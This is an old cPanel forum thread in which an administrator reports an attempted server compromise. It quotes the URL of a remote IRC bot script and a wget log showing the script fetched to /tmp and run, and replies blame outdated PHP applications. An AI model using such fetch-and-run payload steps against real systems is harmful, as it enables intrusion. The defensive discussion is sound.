The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Security Alert - Possible hack script here?

Discussion in 'Security' started by ricoche, Jun 29, 2005.

  1. ricoche

    ricoche Well-Known Member

    Joined:
    Feb 7, 2003
    Messages:
    108
    Likes Received:
    0
    Trophy Points:
    16
    Hello there,

    To Moderators: If this post is not appropriate, please modify or delete asap. Thank you.

    Today I just stumbled upon a hack attempt where someone was trying to invoke the following script. This is the entire URL with script for those interested in dissecting it and setting up some additional security measures. I've been battling this guy for quite some time and he seems to be using similar scripts to this one. So same guy, but nothing new.

    http://www.centpublications.com/images/linuxdaybot.txt

    I have done a lot of security work on the server and so far I've been ok, but if anyone does recognize this script or have experience with fighting it, please let me know. Any insight or additional tips about how to prevent this script from actually getting by on the server would be much appreciated.

    In addition, I have no idea how this is even getting pulled. I have tools such as wget completely shut down. Plus my compilers and a ton of other stuff is shut down and yes manually I have to enable everything if I need to get other things done. I'm used to this though so it's part of life now. Anyway, I would love to know any ideas if possible how this script could be getting in.

    Also, here is an excerpt of a log file concerning this attempt. You can see there are some compile problems and thus the script does not appear to be working? Not sure.

    Code:
    19:17:58 (345.96 KB/s) - `/tmp/php5913' saved [18,700/18,700]
    
    Backslash found where operator expected at /tmp/php5913 line 103, near "$meunick\"
            (Missing operator before \?)
    Backslash found where operator expected at /tmp/php5913 line 103, near ")\"
            (Missing operator before \?)
    Backslash found where operator expected at /tmp/php5913 line 117, near ")\"
      (Might be a runaway multi-line ++ string starting on line 103)
            (Missing operator before \?)
    Backslash found where operator expected at /tmp/php5913 line 122, near ")\"
            (Missing operator before \?)
    Number found where operator expected at /tmp/php5913 line 124, near "} elsif ($servarg =~ m/^\:(.+?)\s+001"
      (Might be a runaway multi-line ++ string starting on line 122)
            (Missing operator before 001?)
    Backslash found where operator expected at /tmp/php5913 line 124, near "001\"
            (Missing operator before \?)
    syntax error at /tmp/php5913 line 103, near ")\"
    syntax error at /tmp/php5913 line 117, near "'nick'} = "
    Execution of /tmp/php5913 aborted due to compilation errors.
    --19:17:58--  http://www.centpublications.com/images/linuxdaybot.txt
               => `/tmp/php5913'
    Resolving www.centpublications.com... 205.234.147.237
    Connecting to www.centpublications.com[205.234.147.237]:80... --19:17:58--  http://www.centpublications.com/images/linuxdaybot.txt
               => `/tmp/php5913'
    Resolving www.centpublications.com... 205.234.147.237
    Connecting to www.centpublications.com[205.234.147.237]:80... connected.
    HTTP request sent, awaiting response... connected.
    HTTP request sent, awaiting response... 200 OK
    
    Thank you.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    That's a generic IRC bit and not something specific to cPanel. They are most likely getting in through a vulnerable php script on the server. Make sure that all your phpBB installations (if there are any) are using the latest release.
     
  3. B12Org

    B12Org Well-Known Member

    Joined:
    Jul 15, 2003
    Messages:
    692
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Seattle Washington
    cPanel Access Level:
    Root Administrator
    Ive found most hack attempts on my servers came from outdated or unpatched phpnuke installs.
     
Loading...

Share This Page